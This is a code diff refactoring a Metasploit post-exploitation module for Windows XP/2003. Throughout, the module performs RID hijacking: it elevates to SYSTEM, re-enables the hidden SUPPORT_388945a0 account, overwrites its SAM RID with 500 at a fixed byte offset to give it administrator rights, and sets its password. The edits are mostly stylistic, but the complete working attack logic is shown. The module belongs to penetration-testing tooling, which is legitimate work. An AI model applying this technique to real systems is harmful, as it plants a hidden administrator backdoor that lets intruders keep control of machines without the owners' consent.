@@ -31,6 +31,11 @@ class MetasploitModule < Msf::Post
               priv_elevate_getsystem
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
         }
       )
     )
@@ -46,29 +51,29 @@ class MetasploitModule < Msf::Post
   def run
     reg_key = 'HKLM\\SAM\\SAM\\Domains\\Account\\Users'
 
-    unless (is_system?())
-      if (datastore['GETSYSTEM'])
-        print_status("Trying to get system...")
+    unless is_system?
+      if datastore['GETSYSTEM']
+        print_status('Trying to get system...')
         res = session.priv.getsystem
-        unless res[0]
-          print_error("Unable to get system! You need to run this script.")
-          return
+        if res[0]
+          print_good('Got system!')
         else
-          print_good("Got system!")
+          print_error('Unable to get system! You need to run this script.')
+          return
         end
       else
-        print_error("You need to run this script as system!")
+        print_error('You need to run this script as system!')
         return
       end
     end
 
-    wver = sysinfo()["OS"]
-    if wver !~ /Windows XP|Windows .NET|Windows 2003/
-      print_error("#{wver} is not supported")
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::Server2003_SP2)
+      print_error("#{version.product_name} is not supported")
       return
     end
 
-    print_status("Target OS is #{wver}")
+    print_status("Target OS is #{version.product_name}")
     names_key = registry_enumkeys(reg_key + '\\Names')
     unless names_key
       print_error("Couldn't access registry keys")
@@ -78,16 +83,18 @@ class MetasploitModule < Msf::Post
     rid = -1
     print_status('Harvesting users...')
     names_key.each do |name|
-      if name.include? 'SUPPORT_388945a0'
-        print_good("Found #{name} account!")
-        skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", "")
-        if not skey
-          print_error("Couldn't open user's key")
-          return
-        end
-        rid = skey['Type']
-        print_status("Target RID is #{rid}")
+      next unless name.include?('SUPPORT_388945a0')
+
+      print_good("Found #{name} account!")
+      skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", '')
+
+      if !skey
+        print_error("Couldn't open user's key")
+        break
       end
+
+      rid = skey['Type']
+      print_status("Target RID is #{rid}")
     end
 
     if rid == -1
@@ -99,43 +106,43 @@ class MetasploitModule < Msf::Post
     users_key.each do |r|
       next if r.to_i(16) != rid
 
-      f = registry_getvaldata(reg_key + "\\#{r}", "F")
+      f = registry_getvaldata(reg_key + "\\#{r}", 'F')
       if check_active(f)
-        print_status("Account is disabled, activating...")
-        f[0x38] = ["10"].pack("H")
+        print_status('Account is disabled, activating...')
+        f[0x38] = ['10'].pack('H')
       else
-        print_error("Target account is already enabled")
+        print_error('Target account is already enabled')
       end
 
-      print_status("Swapping RIDs...!")
+      print_status('Swapping RIDs...!')
       # Overwrite RID to 500 (as administrator)
       f = swap_rid(f, 500)
 
-      open_key = registry_setvaldata(reg_key + "\\#{r}", "F", f, "REG_BINARY")
+      open_key = registry_setvaldata(reg_key + "\\#{r}", 'F', f, 'REG_BINARY')
       unless open_key
         print_error("Can't write to registry... Something's wrong!")
-        return
+        break
       end
 
       print_status("Setting password to #{datastore['PASSWORD']}")
       cmd = cmd_exec('cmd.exe', "/c net user support_388945a0 #{datastore['PASSWORD']}")
-      vprint_status("#{cmd}")
+      vprint_status(cmd.to_s)
     end
   end
 
-  def check_active(f)
-    if f[0x38].unpack("H*")[0].to_i == 11
+  def check_active(f_value)
+    if f_value[0x38].unpack('H*')[0].to_i == 11
       return true
     else
       return false
     end
   end
 
-  def swap_rid(f, rid)
+  def swap_rid(f_value, rid)
     # This function will set hex format to a given RID integer
-    hex = [("%04x" % rid).scan(/.{2}/).reverse.join].pack("H*")
+    hex = [('%04x' % rid).scan(/.{2}/).reverse.join].pack('H*')
     # Overwrite new RID at offset 0x30
-    f[0x30, 2] = hex
-    return f
+    f_value[0x30, 2] = hex
+    return f_value
   end
 end
